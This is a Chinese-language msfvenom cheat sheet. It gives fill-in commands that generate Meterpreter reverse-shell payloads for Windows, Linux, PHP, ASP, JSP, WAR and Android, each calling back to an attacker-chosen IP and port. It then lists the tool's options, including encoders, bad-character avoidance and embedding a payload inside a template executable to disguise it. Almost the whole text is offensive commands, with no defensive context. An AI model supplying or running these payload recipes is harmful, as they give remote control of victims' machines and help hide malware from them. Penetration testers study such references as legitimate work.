0x00 Payload生成
Windows/Linux
Windows:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名
Web
PHP:
msfvenom -p php/meterpreter_reverse_tcp lhost=[你的IP] lport=[端口] -f raw > 保存路径/文件名.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f asp > 保存路径/文件名.asp JSP: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f raw > 保存路径/文件名.jsp WAR: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f war > 保存路径/文件名.war
Android
Android:
msfvenom -p android/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -o 保存路径/文件名.apk
0x01 msfvenom命令参数
1 Options:
2 -p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定
3 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
4 -n, --nopsled <length> 为payload预先指定一个NOP滑动长度
5 -f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
6 -e, --encoder [encoder] 指定需要使用的encoder(编码器)
7 -a, --arch <architecture> 指定payload的目标架构
8 --platform <platform> 指定payload的目标平台
9 -s, --space <length> 设定有效攻击荷载的最大长度
10 -b, --bad-chars <list> 设定规避字符集,比如: '\x00\xff'
11 -i, --iterations <count> 指定payload的编码次数
12 -c, --add-code <path> 指定一个附加的win32 shellcode文件
13 -x, --template <path> 指定一个自定义的可执行文件作为模板
14 -k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
15 --payload-options 列举payload的标准选项
16 -o, --out <path> 保存payload
17 -v, --var-name <name> 指定一个自定义的变量,以确定输出格式
18 --shellest 最小化生成payload
19 -h, --help 查看帮助选项
20 --help-formats 查看msf支持的输出格式列表